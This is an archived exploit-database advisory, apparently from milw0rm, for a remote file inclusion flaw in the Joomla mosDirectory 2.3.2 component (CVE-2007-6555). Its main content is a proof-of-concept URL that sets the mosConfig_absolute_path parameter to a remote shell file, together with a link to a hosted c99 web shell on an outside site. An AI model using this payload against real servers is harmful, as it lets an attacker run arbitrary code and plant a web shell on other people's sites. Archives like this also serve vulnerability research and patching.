Joomla! Component mosDirectory 2.3.2 - Remote File Inclusion
Author: ShockShadow
type: webapps
platform: php
port:
date_added: 2007-12-23
date_updated: 2016-11-08
verified: 1
codes: OSVDB-40023;CVE-2007-6555
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.commosdirectory.v2.3.2.zip
--==+=================== Electronic Security Team (www.Yee7.com) =================+==--
--==+ Joomla Component mosDirectory 2.3.2 Remote File Inclusion +==--
--==+=============================================================================+==--
Software: Joomla Component mosDirectory 2.3.2
exploit: Remote File Inclusion [High Risk]
By: ShockShadow - Electronic Security Team (www.Yee7.com)
Home: www.Yee7.com
Download: http://www.box.net/shared/kdp2h6dbe1
txtShell: http://yee7.com/shells/c99.txt
##############################
==============
Dork: priv8 ;)
PoC:
http://domain.com/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://shell.txt?
###############################
by: ShockShadow
Thanks to: ArabHacker, Alyahmom, Trojan, Alakrb Almoftres, Qanas Alyahood, Kates-Ye
AND ALL Yee7.com members
# milw0rm.com [2007-12-24]